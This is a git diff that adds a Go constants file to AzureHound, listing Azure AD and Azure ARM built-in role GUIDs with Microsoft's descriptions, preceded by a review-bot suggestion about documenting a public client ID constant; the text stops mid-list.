diff --git a/constants/roles.go b/constants/roles.go
new file mode 100644
index 0000000..b7ad549
--- /dev/null
+++ b/constants/roles.go
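Review bot: `AzPowerShellClientID` is added to the const block without a comment, and a bare GUID in a constants file is easy to mistake for a credential or a tenant-specific value. Going by the name it is the public application (client) ID of Microsoft's Azure PowerShell app, which is an identifier rather than a secret. How it is used is outside this hunk, but if sign-ins are made with it they will be attributed to that application in sign-in logs, which matters to anyone building detections around this tool. I would add `// AzPowerShellClientID is the well-known public client ID of the Azure PowerShell application; it is not a secret.` above it. The comment on `UserAgent` should start with the function name, `// UserAgent returns the value sent in the User-Agent header, "<Name>/<Version>".`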
@@ -0,0 +1,1370 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package constants + +// Azure AD built-in roles +// See https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference for more info. +const ( + // Can create and manage all aspects of app registrations and enterprise apps. + ApplicationAdministratorRoleID string = "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3" + + // Can create application registrations independent of the 'Users can register applications' setting. + ApplicationDeveloperRoleID string = "cf1c38e5-3621-4004-a7cb-879624dced7c" + + // Can create attack payloads that an administrator can initiate later. + AttackPayloadAuthorRoleID string = "9c6df0f2-1e7c-4dc3-b195-66dfbd24aa8f" + + // Can create and manage all aspects of attack simulation campaigns. + AttackSimulationAdministratorRoleID string = "c430b396-e693-46cc-96f3-db01bf8bb62a" + + // Assign custom security attribute keys and values to supported Azure AD objects. + AttributeAssignmentAdministratorRoleID string = "58a13ea3-c632-46ae-9ee0-9c0d43cd7f3d" + + // Read custom security attribute keys and values for supported Azure AD objects. + AttributeAssignmentReaderRoleID string = "ffd52fa5-98dc-465c-991d-fc073eb59f8f" + + // Define and manage the definition of custom security attributes. 
+ AttributeDefinitionAdministratorRoleID string = "8424c6f0-a189-499e-bbd0-26c1753c96d4" + + // Read the definition of custom security attributes. + AttributeDefinitionReaderRoleID string = "1d336d2c-4ae8-42ef-9711-b3604ce3fc2c" + + // Can access to view, set and reset authentication method information for any non-admin user. + AuthenticationAdministratorRoleID string = "c4e39bd9-1100-46d3-8c65-fb160da0071f" + + // Can create and manage the authentication methods policy, tenant-wide MFA settings, password protection policy, and verifiable credentials. + AuthenticationPolicyAdministratorRoleID string = "0526716b-113d-4c15-b2c8-68e3c22b9f80" + + // Users assigned to this role are added to the local administrators group on Azure AD-joined devices. + AzureADJoinedDeviceLocalAdministratorRoleID string = "9f06204d-73c1-4d4c-880a-6edb90606fd8" + + // Can manage Azure DevOps organization policy and settings. + AzureDevOpsAdministratorRoleID string = "e3973bdf-4987-49ae-837a-ba8e231c7286" + + // Can manage all aspects of the Azure Information Protection product. + AzureInformationProtectionAdministratorRoleID string = "7495fdc4-34c4-4d15-a289-98788ce399fd" + + // Can manage secrets for federation and encryption in the Identity Experience Framework (IEF). + B2CIEFKeysetAdministratorRoleID string = "aaf43236-0c0d-4d5f-883a-6955382ac081" + + // Can create and manage trust framework policies in the Identity Experience Framework (IEF). + B2CIEFPolicyAdministratorRoleID string = "3edaf663-341e-4475-9f94-5c398ef6c070" + + // Can perform common billing related tasks like updating payment information. + BillingAdministratorRoleID string = "b0f54661-2d74-4c50-afa3-1ec803f12efe" + + // Can manage all aspects of the Cloud App Security product. + CloudAppSecurityAdministratorRoleID string = "892c5842-a9a6-463a-8041-72aa08ca3cf6" + + // Can create and manage all aspects of app registrations and enterprise apps except App Proxy. 
+ CloudApplicationAdministratorRoleID string = "158c047a-c907-4556-b7ef-446551a6b5f7" + + // Limited access to manage devices in Azure AD. + CloudDeviceAdministratorRoleID string = "7698a772-787b-4ac8-901f-60d6b08affd2" + + // Can read and manage compliance configuration and reports in Azure AD and Microsoft 365. + ComplianceAdministratorRoleID string = "17315797-102d-40b4-93e0-432062caca18" + + // Creates and manages compliance content. + ComplianceDataAdministratorRoleID string = "e6d1a23a-da11-4be4-9570-befc86d067a7" + + // Can manage Conditional Access capabilities. + ConditionalAccessAdministratorRoleID string = "b1be1c3e-b65d-4f19-8427-f6fa0d97feb9" + + // Can approve Microsoft support requests to access customer organizational data. + CustomerLockBoxAccessApproverRoleID string = "5c4f9dcd-47dc-4cf7-8c9a-9e4207cbfc91" + + // Can access and manage Desktop management tools and services. + DesktopAnalyticsAdministratorRoleID string = "38a96431-2bdf-4b4c-8b6e-5d3d8abac1a4" + + // Deprecated - Do Not Use. + DeviceJoinRoleID string = "9c094953-4995-41c8-84c8-3ebb9b32c93f" + + // Deprecated - Do Not Use. + DeviceManagersRoleID string = "2b499bcd-da44-4968-8aec-78e1674fa64d" + + // Deprecated - Do Not Use. + DeviceUsersRoleID string = "d405c6df-0af8-4e3b-95e4-4d06e542189e" + + // Can read basic directory information. Commonly used to grant directory read access to applications and guests. + DirectoryReadersRoleID string = "88d8e3e3-8f55-4a1e-953a-9b9898b8876b" + + // Only used by Azure AD Connect service. + DirectorySynchronizationAccountsRoleID string = "d29b2b05-8046-44ba-8758-1e26182fcf32" + + // Can read and write basic directory information. For granting access to applications, not intended for users. + DirectoryWritersRoleID string = "9360feb5-f418-4baa-8175-e2a00bac4301" + + // Can manage domain names in cloud and on-premises. 
+ DomainNameAdministratorRoleID string = "8329153b-31d0-4727-b945-745eb3bc5f31" + + // Can manage all aspects of the Dynamics 365 product. + Dynamics365AdministratorRoleID string = "44367163-eba1-44c3-98af-f5787879f96a" + + // Manage all aspects of Microsoft Edge. + EdgeAdministratorRoleID string = "3f1acade-1e04-4fbc-9b69-f0302cd84aef" + + // Can manage all aspects of the Exchange product. + ExchangeAdministratorRoleID string = "29232cdf-9323-42fd-ade2-1d097af3e4de" + + // Can create or update Exchange Online recipients within the Exchange Online organization. + ExchangeRecipientAdministratorRoleID string = "31392ffb-586c-42d1-9346-e59415a2cc4e" + + // Can create and manage all aspects of user flows. + ExternalIDUserFlowAdministratorRoleID string = "6e591065-9bad-43ed-90f3-e9424366d2f0" + + // Can create and manage the attribute schema available to all user flows. + ExternalIDUserFlowAttributeAdministratorRoleID string = "0f971eea-41eb-4569-a71e-57bb8a3eff1e" + + // Can configure identity providers for use in direct federation. + ExternalIdentityProviderAdministratorRoleID string = "be2f45a1-457d-42af-a067-6ec1fa63bc45" + + // Can manage all aspects of Azure AD and Microsoft services that use Azure AD identities. + GlobalAdministratorRoleID string = "62e90394-69f5-4237-9190-012177145e10" + + // Can read everything that a Global Administrator can, but not update anything. + GlobalReaderRoleID string = "f2ef992c-3afb-46b9-b7cf-a126ee74c451" + + // Members of this role can create/manage groups, create/manage groups settings like naming and expiration policies, and view groups activity and audit reports. + GroupsAdministratorRoleID string = "fdd7a751-b60b-444a-984c-02652fe8fa1c" + + // Can invite guest users independent of the 'members can invite guests' setting. + GuestInviterRoleID string = "95e79109-95c0-4d8e-aee3-d01accf2d47b" + + // Default role for guest users. Can read a limited set of directory information. 
+ GuestUserRoleID string = "10dae51f-b6af-4016-8d66-8c2a99b929b3" + + // Can reset passwords for non-administrators and Helpdesk Administrators. + HelpdeskAdministratorRoleID string = "729827e3-9c14-49f7-bb1b-9608f156bbb8" + + // Can manage AD to Azure AD cloud provisioning, Azure AD Connect, and federation settings. + HybridIdentityAdministratorRoleID string = "8ac3fc64-6eca-42ea-9e69-59f4c7b60eb2" + + // Manage access using Azure AD for identity governance scenarios. + IdentityGovernanceAdministratorRoleID string = "45d8d3c5-c802-45c6-b32a-1d70b5e1e86e" + + // Has administrative access in the Microsoft 365 Insights app. + InsightsAdministratorRoleID string = "eb1f4a8d-243a-41f0-9fbd-c7cdf6c5ef7c" + + // Access the analytical capabilities in Microsoft Viva Insights and run custom queries. + InsightsAnalystRoleID string = "25df335f-86eb-4119-b717-0ff02de207e9" + + // Can view and share dashboards and insights via the M365 Insights app. + InsightsBusinessLeaderRoleID string = "31e939ad-9672-4796-9c2e-873181342d2d" + + // Can manage all aspects of the Intune product. + IntuneAdministratorRoleID string = "3a2c62db-5318-420d-8d74-23affee5d9d5" + + // Can manage settings for Microsoft Kaizala. + KaizalaAdministratorRoleID string = "74ef975b-6605-40af-a5d2-b9539d836353" + + // Can configure knowledge, learning, and other intelligent features. + KnowledgeAdministratorRoleID string = "b5a8dcf3-09d5-43a9-a639-8e29ef291470" + + // Has access to topic management dashboard and can manage content. + KnowledgeManagerRoleID string = "744ec460-397e-42ad-a462-8b3f9747a02c" + + // Can manage product licenses on users and groups. + LicenseAdministratorRoleID string = "4d6ac14f-3453-41d0-bef9-a3e0c569773a" + + // Create and manage all aspects of workflows and tasks associated with Lifecycle Workflows in Azure AD. + LifecycleWorkflowsAdministratorRoleID string = "59d46f88-662b-457b-bceb-5c3809e5908f" + + // Can read security messages and updates in Office 365 Message Center only. 
+ MessageCenterPrivacyReaderRoleID string = "ac16e43d-7b2d-40e0-ac05-243ff356ab5b" + + // Can read messages and updates for their organization in Office 365 Message Center only. + MessageCenterReaderRoleID string = "790c1fb9-7f7d-4f88-86a1-ef1f95c05c1b" + + // Can manage network locations and review enterprise network design insights for Microsoft 365 Software as a Service applications. + NetworkAdministratorRoleID string = "d37c8bed-0711-4417-ba38-b4abe66ce4c2" + + // Can manage Office apps cloud services, including policy and settings management, and manage the ability to select, unselect and publish 'what's new' feature content to end-user's devices. + OfficeAppsAdministratorRoleID string = "2b745bdf-0803-4d80-aa65-822c4493daac" + + // Do not use - not intended for general use. + PartnerTier1SupportRoleID string = "4ba39ca4-527c-499a-b93d-d9b492c50246" + + // Do not use - not intended for general use. + PartnerTier2SupportRoleID string = "e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8" + + // Can reset passwords for non-administrators and Password Administrators. + PasswordAdministratorRoleID string = "966707d0-3269-4727-9be2-8c3a10f19b9d" + + // Manage all aspects of Entra Permissions Management. + PermissionsManagementAdministratorRoleID string = "af78dc32-cf4d-46f9-ba4e-4428526346b5" + + // Can manage all aspects of the Power BI product. + PowerBIAdministratorRoleID string = "a9ea8996-122f-4c74-9520-8edcd192826c" + + // Can create and manage all aspects of Microsoft Dynamics 365, PowerApps and Microsoft Flow. + PowerPlatformAdministratorRoleID string = "11648597-926c-4cf3-9c36-bcebb0ba8dcc" + + // Can manage all aspects of printers and printer connectors. + PrinterAdministratorRoleID string = "644ef478-e28f-4e28-b9dc-3fdde9aa0b1f" + + // Can register and unregister printers and update printer status. 
+ PrinterTechnicianRoleID string = "e8cef6f1-e4bd-4ea8-bc07-4b8d950f4477" + + // Can access to view, set and reset authentication method information for any user (admin or non-admin). + PrivilegedAuthenticationAdministratorRoleID string = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13" + + // Can manage role assignments in Azure AD, and all aspects of Privileged Identity Management. + PrivilegedRoleAdministratorRoleID string = "e8611ab8-c189-46e8-94e1-60213ab1f814" + + // Can read sign-in and audit reports. + ReportsReaderRoleID string = "4a5d8f65-41da-4de4-8968-e035b65339cf" + + // Restricted role for guest users. Can read a limited set of directory information. + RestrictedGuestUserRoleID string = "2af84b1e-32c8-42b7-82bc-daa82404023b" + + // Can create and manage all aspects of Microsoft Search settings. + SearchAdministratorRoleID string = "0964bb5e-9bdb-4d7b-ac29-58e794862a40" + + // Can create and manage the editorial content such as bookmarks, Q and As, locations, floorplan. + SearchEditorRoleID string = "8835291a-918c-4fd7-a9ce-faa49f0cf7d9" + + // Can read security information and reports, and manage configuration in Azure AD and Office 365. + SecurityAdministratorRoleID string = "194ae4cb-b126-40b2-bd5b-6091b380977d" + + // Creates and manages security events. + SecurityOperatorRoleID string = "5f2222b1-57c3-48ba-8ad5-d4759f1fde6f" + + // Can read security information and reports in Azure AD and Office 365. + SecurityReaderRoleID string = "5d6b6bb7-de71-4623-b4af-96380a352509" + + // Can read service health information and manage support tickets. + ServiceSupportAdministratorRoleID string = "f023fd81-a637-4b56-95fd-791ac0226033" + + // Can manage all aspects of the SharePoint service. + SharePointAdministratorRoleID string = "f28a1f50-f6e7-4571-818b-6a12f2af6b6c" + + // Can manage all aspects of the Skype for Business product. + SkypeforBusinessAdministratorRoleID string = "75941009-915a-4869-abe7-691bff18279e" + + // Can manage the Microsoft Teams service. 
+ TeamsAdministratorRoleID string = "69091246-20e8-4a56-aa4d-066075b2a7a8" + + // Can manage calling and meetings features within the Microsoft Teams service. + TeamsCommunicationsAdministratorRoleID string = "baf37b3a-610e-45da-9e62-d9d1e5e8914b" + + // Can troubleshoot communications issues within Teams using advanced tools. + TeamsCommunicationsSupportEngineerRoleID string = "f70938a0-fc10-4177-9e90-2178f8765737" + + // Can troubleshoot communications issues within Teams using basic tools. + TeamsCommunicationsSupportSpecialistRoleID string = "fcf91098-03e3-41a9-b5ba-6f0ec8188a12" + + // Can perform management related tasks on Teams certified devices. + TeamsDevicesAdministratorRoleID string = "3d762c5a-1b6c-493f-843e-55a3b42923d4" + + // Can see only tenant level aggregates in Microsoft 365 Usage Analytics and Productivity Score. + UsageSummaryReportsReaderRoleID string = "75934031-6c7e-415a-99d7-48dbd49e875e" + + // Default role for member users. Can read all and write a limited set of directory information. + UserRoleID string = "a0b1b346-4d3e-4e8b-98f8-753987be4970" + + // Can manage all aspects of users and groups, including resetting passwords for limited admins. + UserAdministratorRoleID string = "fe930be7-5e62-47db-91af-98c3a49a38b1" + + // Manage and share Virtual Visits information and metrics from admin centers or the Virtual Visits app. + VirtualVisitsAdministratorRoleID string = "e300d9e7-4a2b-4295-9eff-f1c78b36cc98" + + // Can provision and manage all aspects of Cloud PCs. + Windows365AdministratorRoleID string = "11451d60-acb2-45eb-a7d6-43d0f0125c13" + + // Can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. + WindowsUpdateDeploymentAdministratorRoleID string = "32696413-001a-46ae-978c-ce0f6b3620d2" + + // Deprecated - Do Not Use. + WorkplaceDeviceJoinRoleID string = "c34f683f-4d5a-4403-affd-6615e00e3a7f" + + // Manage all aspects of the Yammer service. 
+ YammerAdministratorRoleID string = "810a2642-a034-447f-a5e8-41beaa378541" +) + +// Azure ARM roles +// See https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles +const ( + // Can customize the developer portal, edit its content, and publish it. + APIManagementDeveloperPortalContentEditorRoleID string = "c031e6a8-4391-4de0-8d69-4706a7ed3729" + + // Can manage service and the APIs + APIManagementServiceContributorRoleID string = "312a565d-c81f-4fd8-895a-4e21e48d571c" + + // Can manage service but not the APIs + APIManagementServiceOperatorRoleID string = "e022efe7-f5ba-4159-bbe4-b44f577e9b61" + + // Read-only access to service and APIs + APIManagementServiceReaderRoleID string = "71522526-b88f-4d52-b57f-d31fc3546d0d" + + // Lets you grant Access Review System app permissions to discover and revoke access as needed by the access review process. + AccessReviewOperatorServiceRoleID string = "76cc9ee4-d5d3-4a45-a930-26add3d73475" + + // acr delete + AcrDeleteRoleID string = "c2f4ef07-c644-48eb-af81-4b1b4947fb11" + + // acr image signer + AcrImageSignerRoleID string = "6cef56e8-d556-48e5-a04f-b8e64114680f" + + // acr pull + AcrPullRoleID string = "7f951dda-4ed3-4680-a7ca-43fe172d538d" + + // acr push + AcrPushRoleID string = "8311e382-0749-4cb8-b61a-304f252e45ec" + + // acr quarantine data reader + AcrQuarantineReaderRoleID string = "cdda3590-29a3-44f6-95f2-9f980659eb04" + + // acr quarantine data writer + AcrQuarantineWriterRoleID string = "c8d4ff99-41c3-41a8-9f60-21dfdad59608" + + // Provides contribute access to manage sensor related entities in AgFood Platform Service + AgFoodPlatformSensorPartnerContributorRoleID string = "6b77f0a0-0d89-41cc-acd1-579c22c17a67" + + // Provides admin access to AgFood Platform Service + AgFoodPlatformServiceAdminRoleID string = "f8da80de-1ff9-4747-ad80-a19b7f6079e3" + + // Provides contribute access to AgFood Platform Service + AgFoodPlatformServiceContributorRoleID string = 
"8508508a-4469-4e45-963b-2518ee0bb728" + + // Provides read access to AgFood Platform Service + AgFoodPlatformServiceReaderRoleID string = "7ec7ccdc-f61e-41fe-9aaf-980df0a44eba" + + // Basic user role for AnyBuild. This role allows listing of agent information and execution of remote build capabilities. + AnyBuildBuilderRoleID string = "a2138dac-4907-4679-a376-736901ed8ad8" + + // Allows full access to App Configuration data. + AppConfigurationDataOwnerRoleID string = "5ae67dd6-50cb-40e7-96ff-dc2bfa4b606b" + + // Allows read access to App Configuration data. + AppConfigurationDataReaderRoleID string = "516239f1-63e1-4d78-a4de-a74fb236a071" + + // Contributor of the Application Group. + ApplicationGroupContributorRoleID string = "ca6382a4-1721-4bcf-a114-ff0c70227b6b" + + // Can manage Application Insights components + ApplicationInsightsComponentContributorRoleID string = "ae349356-3a1b-4a5e-921d-050484c6347e" + + // Gives user permission to use Application Insights Snapshot Debugger features + ApplicationInsightsSnapshotDebuggerRoleID string = "08954f03-6346-4c2e-81c0-ec3a5cfae23b" + + // Can read write or delete the attestation provider instance + AttestationContributorRoleID string = "bbf86eb8-f7b4-4cce-96e4-18cddf81d86e" + + // Can read the attestation provider properties + AttestationReaderRoleID string = "fd1bd22b-8476-40bc-a0bc-69b95687b9f3" + + // Manage azure automation resources and other resources using azure automation. + AutomationContributorRoleID string = "f353d9bd-d4a6-484e-a77a-8050b599b867" + + // Create and Manage Jobs using Automation Runbooks. + AutomationJobOperatorRoleID string = "4fe576fe-1146-4730-92eb-48519fa6bf9f" + + // Automation Operators are able to start, stop, suspend, and resume jobs + AutomationOperatorRoleID string = "d3881f73-407a-4167-8283-e981cbba0404" + + // Read Runbook properties - to be able to create Jobs of the runbook. 
+ AutomationRunbookOperatorRoleID string = "5fb5aef8-1081-4b8e-bb16-9d5d0385bab5" + + // Grants permissions to upload and manage new Autonomous Development Platform measurements. + AutonomousDevelopmentPlatformDataContributorRoleID string = "b8b15564-4fa6-4a59-ab12-03e1d9594795" + + // Grants full access to Autonomous Development Platform data. + AutonomousDevelopmentPlatformDataOwnerRoleID string = "27f8b550-c507-4db9-86f2-f4b8e816d59d" + + // Grants read access to Autonomous Development Platform data. + AutonomousDevelopmentPlatformDataReaderRoleID string = "d63b75f7-47ea-4f27-92ac-e0d173aaf093" + + // Can create and manage an Avere vFXT cluster. + AvereContributorRoleID string = "4f8fab4f-1852-4a58-a46a-8eaf358af14a" + + // Used by the Avere vFXT cluster to manage the cluster + AvereOperatorRoleID string = "c025889f-8102-4ebf-b32c-fc0c6f0c6bd9" + + // List cluster user credentials action. + AzureArcEnabledKubernetesClusterUserRoleID string = "00493d72-78f6-4148-b6c5-d3ce8e4799dd" + + // Lets you manage all resources under cluster/namespace, except update or delete resource quotas and namespaces. + AzureArcKubernetesAdminRoleID string = "dffb1e0c-446f-4dde-a09f-99eb5cc68b96" + + // Lets you manage all resources in the cluster. + AzureArcKubernetesClusterAdminRoleID string = "8393591c-06b9-48a2-a542-1bd6b377f6a2" + + // Lets you view all resources in cluster/namespace, except secrets. + AzureArcKubernetesViewerRoleID string = "63f0a09d-1495-4db4-a681-037d84835eb4" + + // Lets you update everything in cluster/namespace, except (cluster)roles and (cluster)role bindings. + AzureArcKubernetesWriterRoleID string = "5b999177-9696-4545-85c7-50de3797e5a1" + + // Arc ScVmm VM Administrator has permissions to perform all ScVmm actions. + AzureArcScVmmAdministratorRoleID string = "a92dfd61-77f9-4aec-a531-19858b406c87" + + // Azure Arc ScVmm Private Cloud User has permissions to use the ScVmm resources to deploy VMs. 
+ AzureArcScVmmPrivateCloudUserRoleID string = "c0781e91-8102-4553-8951-97c6d4243cda" + + // Azure Arc ScVmm Private Clouds Onboarding role has permissions to provision all the required resources for onboard and deboard vmm server instances to Azure. + AzureArcScVmmPrivateCloudsOnboardingRoleID string = "6aac74c4-6311-40d2-bbdd-7d01e7c6e3a9" + + // Arc ScVmm VM Contributor has permissions to perform all VM actions. + AzureArcScVmmVMContributorRoleID string = "e582369a-e17b-42a5-b10c-874c387c530b" + + // Arc VMware VM Contributor has permissions to perform all connected VMwarevSphere actions. + AzureArcVMwareAdministratorRoleID string = "ddc140ed-e463-4246-9145-7c664192013f" + + // Azure Arc VMware Private Cloud User has permissions to use the VMware cloud resources to deploy VMs. + AzureArcVMwarePrivateCloudUserRoleID string = "ce551c02-7c42-47e0-9deb-e3b6fc3a9a83" + + // Azure Arc VMware Private Clouds Onboarding role has permissions to provision all the required resources for onboard and deboard vCenter instances to Azure. + AzureArcVMwarePrivateCloudsOnboardingRoleID string = "67d33e57-3129-45e6-bb0b-7cc522f762fa" + + // Arc VMware VM Contributor has permissions to perform all VM actions. + AzureArcVMwareVMContributorRoleID string = "b748a06d-6150-4f8a-aaa9-ce3940cd96cb" + + // Can onboard Azure Connected Machines. + AzureConnectedMachineOnboardingRoleID string = "b64e21ea-ac4e-4cdf-9dc9-5b892992bee7" + + // Can read, write, delete and re-onboard Azure Connected Machines. + AzureConnectedMachineResourceAdministratorRoleID string = "cd570a14-e51a-42ad-bac8-bafd67325302" + + // Microsoft.AzureArcData service role to access the resources of Microsoft.AzureArcData stored with RPSAAS. 
+ AzureConnectedSQLServerOnboardingRoleID string = "e8113dce-c529-4d33-91fa-e9b972617508" + + // Full access role for Digital Twins data-plane + AzureDigitalTwinsDataOwnerRoleID string = "bcd981a7-7f74-457b-83e1-cceb9e632ffe" + + // Read-only role for Digital Twins data-plane properties + AzureDigitalTwinsDataReaderRoleID string = "d57506d4-4c8d-48b1-8587-93c323f6a5a3" + + // Allows for full access to Azure Event Hubs resources. + AzureEventHubsDataOwnerRoleID string = "f526a384-b230-433a-b45c-95f59c4a2dec" + + // Allows receive access to Azure Event Hubs resources. + AzureEventHubsDataReceiverRoleID string = "a638d3c7-ab3a-418d-83e6-5f17a39d4fde" + + // Allows send access to Azure Event Hubs resources. + AzureEventHubsDataSenderRoleID string = "2b629674-e913-4c01-ae53-ef4638d8f975" + + // List cluster admin credential action. + AzureKubernetesServiceClusterAdminRoleID string = "0ab0b1a8-8aac-4efd-b8c2-3ee1fb270be8" + + // List cluster user credential action. + AzureKubernetesServiceClusterUserRoleID string = "4abbcc35-e782-43d8-92c5-2d3f1bd2253f" + + // Grants access to read and write Azure Kubernetes Service clusters + AzureKubernetesServiceContributorRoleID string = "ed7f3fbd-7b88-4dd4-9017-9adb7ce333f8" + + // Deploy the Azure Policy add-on on Azure Kubernetes Service clusters + AzureKubernetesServicePolicyAddonDeploymentRoleID string = "18ed5180-3e48-46fd-8541-4ea054d57064" + + // Lets you manage all resources under cluster/namespace, except update or delete resource quotas and namespaces. + AzureKubernetesServiceRBACAdminRoleID string = "3498e952-d568-435e-9b2c-8d77e338d7f7" + + // Lets you manage all resources in the cluster. + AzureKubernetesServiceRBACClusterAdminRoleID string = "b1ff04bb-8a4e-4dc4-8eb5-8693973ce19b" + + // Allows read-only access to see most objects in a namespace. It does not allow viewing roles or role bindings. 
This role does not allow viewing Secrets, since reading the contents of Secrets enables access to ServiceAccount credentials in the namespace, which would allow API access as any ServiceAccount in the namespace (a form of privilege escalation). Applying this role at cluster scope will give access across all namespaces. + AzureKubernetesServiceRBACReaderRoleID string = "7f6c6a51-bcf8-42ba-9220-52d62157d7db" + + // Allows read/write access to most objects in a namespace.This role does not allow viewing or modifying roles or role bindings. However, this role allows accessing Secrets and running Pods as any ServiceAccount in the namespace, so it can be used to gain the API access levels of any ServiceAccount in the namespace. Applying this role at cluster scope will give access across all namespaces. + AzureKubernetesServiceRBACWriterRoleID string = "a7ffa36f-339b-4b5c-8bdf-e2c188b2c0eb" + + // Grants access all Azure Maps resource management. + AzureMapsContributorRoleID string = "dba33070-676a-4fb0-87fa-064dc56ff7fb" + + // Grants access to read, write, and delete access to map related data from an Azure maps account. + AzureMapsDataContributorRoleID string = "8f5e0ce6-4f7b-4dcf-bddf-e6f48634a204" + + // Grants access to read map related data from an Azure maps account. + AzureMapsDataReaderRoleID string = "423170ca-a8f6-4b0f-8487-9e4eb8f49bfa" + + // Grants access to very limited set of data APIs for common visual web SDK scenarios. Specifically, render and search data APIs. + AzureMapsSearchandRenderDataReaderRoleID string = "6be48352-4f82-47c9-ad5e-0acacefdb005" + + // Allows for listen access to Azure Relay resources. + AzureRelayListenerRoleID string = "26e0b698-aa6d-4085-9386-aadae190014d" + + // Allows for full access to Azure Relay resources. + AzureRelayOwnerRoleID string = "2787bf04-f1f5-4bfe-8383-c8a24483ee38" + + // Allows for send access to Azure Relay resources. 
+ AzureRelaySenderRoleID string = "26baccc8-eea7-41f1-98f4-1762cc7f685d" + + // Allows for full access to Azure Service Bus resources. + AzureServiceBusDataOwnerRoleID string = "090c5cfd-751d-490a-894a-3ce6f1109419" + + // Allows for receive access to Azure Service Bus resources. + AzureServiceBusDataReceiverRoleID string = "4f6d3b9b-027b-4f4c-9142-0e5a2a2247e0" + + // Allows for send access to Azure Service Bus resources. + AzureServiceBusDataSenderRoleID string = "69a216fc-b8fb-44d8-bc22-1f3c2cd27a39" + + // Allow read, write and delete access to Azure Spring Cloud Config Server + AzureSpringCloudConfigServerContributorRoleID string = "a06f5c24-21a7-4e1a-aa2b-f19eb6684f5b" + + // Allow read access to Azure Spring Cloud Config Server + AzureSpringCloudConfigServerReaderRoleID string = "d04c6db6-4947-4782-9e91-30a88feb7be7" + + // Allow read access to Azure Spring Cloud Data + AzureSpringCloudDataReaderRoleID string = "b5537268-8956-4941-a8f0-646150406f0c" + + // Allow read, write and delete access to Azure Spring Cloud Service Registry + AzureSpringCloudServiceRegistryContributorRoleID string = "f5880b48-c26d-48be-b172-7927bfa1c8f1" + + // Allow read access to Azure Spring Cloud Service Registry + AzureSpringCloudServiceRegistryReaderRoleID string = "cff1b556-2399-4e7e-856d-a8f754be7b65" + + // Lets you manage Azure Stack registrations. + AzureStackRegistrationOwnerRoleID string = "6f12a6df-dd06-4f3e-bcb1-ce8be600526a" + + // Azure VM Managed identities restore Contributors are allowed to perform Azure VM Restores with managed identities both user and system + AzureVMManagedidentitiesrestoreContributorRoleID string = "6ae96244-5829-4925-a7d3-5975537d91dd" + + // Can perform all actions within an Azure Machine Learning workspace, except for creating or deleting compute resources and modifying the workspace itself. 
+ AzureMLDataScientistRoleID string = "f6c7c914-8db3-469d-8ca1-694a8f32e121" + + // Lets you write metrics to AzureML workspace + AzureMLMetricsWriterRoleID string = "635dd51f-9968-44d3-b7fb-6d9a6bd613ae" + + // Lets you manage backup service,but can't create vaults and give access to others + BackupContributorRoleID string = "5e467623-bb1f-42f4-a55d-6e525e11384b" + + // Lets you manage backup services, except removal of backup, vault creation and giving access to others + BackupOperatorRoleID string = "00c29273-979b-4161-815c-10b084fb9324" + + // Can view backup services, but can't make changes + BackupReaderRoleID string = "a795c7a0-d4a2-40c1-ae25-d81f01202912" + + // Allows read access to billing data + BillingReaderRoleID string = "fa23ad8b-c56e-40d8-ac0c-ce449e1d2c64" + + // Lets you manage BizTalk services, but not access to them. + BizTalkContributorRoleID string = "5e3c6656-6cfa-4708-81fe-0de47ac73342" + + // Allows for access to Blockchain Member nodes + BlockchainMemberNodeAccessRoleID string = "31a002a1-acaf-453e-8a5b-297c9ca1ea24" + + // Can manage blueprint definitions, but not assign them. + BlueprintContributorRoleID string = "41077137-e803-4205-871c-5a86e6a753b4" + + // Can assign existing published blueprints, but cannot create new blueprints. NOTE: this only works if the assignment is done with a user-assigned managed identity. + BlueprintOperatorRoleID string = "437d2ced-4a38-4302-8479-ed2bcb43d090" + + // Can manage CDN endpoints, but can’t grant access to other users. + CDNEndpointContributorRoleID string = "426e0c7f-0c7e-4658-b36f-ff54d6c29b45" + + // Can view CDN endpoints, but can’t make changes. + CDNEndpointReaderRoleID string = "871e35f6-b5c1-49cc-a043-bde969a0f2cd" + + // Can manage CDN profiles and their endpoints, but can’t grant access to other users. + CDNProfileContributorRoleID string = "ec156ff8-a8d1-4d15-830c-5b80698ca432" + + // Can view CDN profiles and their endpoints, but can’t make changes. 
+ CDNProfileReaderRoleID string = "8f96442b-4075-438f-813d-ad51ab4019af" + + // Lets you manage everything under your HPC Workbench chamber. + ChamberAdminRoleID string = "4e9b8407-af2e-495b-ae54-bb60a55b1b5a" + + // Lets you view everything under your HPC Workbench chamber, but not make any changes. + ChamberUserRoleID string = "4447db05-44ed-4da3-ae60-6cbece780e32" + + // Lets you manage classic networks, but not access to them. + ClassicNetworkContributorRoleID string = "b34d265f-36f7-4a0d-a4d4-e158ca92e90f" + + // Lets you manage classic storage accounts, but not access to them. + ClassicStorageAccountContributorRoleID string = "86e8f5dc-a6e9-4c67-9d15-de283e8eac25" + + // Classic Storage Account Key Operators are allowed to list and regenerate keys on Classic Storage Accounts + ClassicStorageAccountKeyOperatorServiceRoleID string = "985d6b00-f706-48f5-a6fe-d0ca12fb668d" + + // Lets you manage classic virtual machines, but not access to them, and not the virtual network or storage account they’re connected to. + ClassicVirtualMachineContributorRoleID string = "d73bb868-a0df-4d4d-bd69-98a00b01fccb" + + // Lets you manage ClearDB MySQL databases, but not access to them. + ClearDBMySQLDBContributorRoleID string = "9106cda0-8a86-4e81-b686-29a22c54effe" + + // Manage identity or business verification requests. This role is in preview and subject to change. + CodeSigningIdentityVerifierRoleID string = "4339b7cf-9826-4e41-b4ed-c7f4505dac08" + + // Sign files with a certificate profile. This role is in preview and subject to change. + CodeSigningCertificateProfileSignerRoleID string = "2837e146-70d7-4cfd-ad55-7efa6464f958" + + // Lets you create, read, update, delete and manage keys of Cognitive Services. + CognitiveServicesContributorRoleID string = "25fbc0a9-bd7c-42a3-aa1a-3b75d497ee68" + + // Full access to the project, including the ability to view, 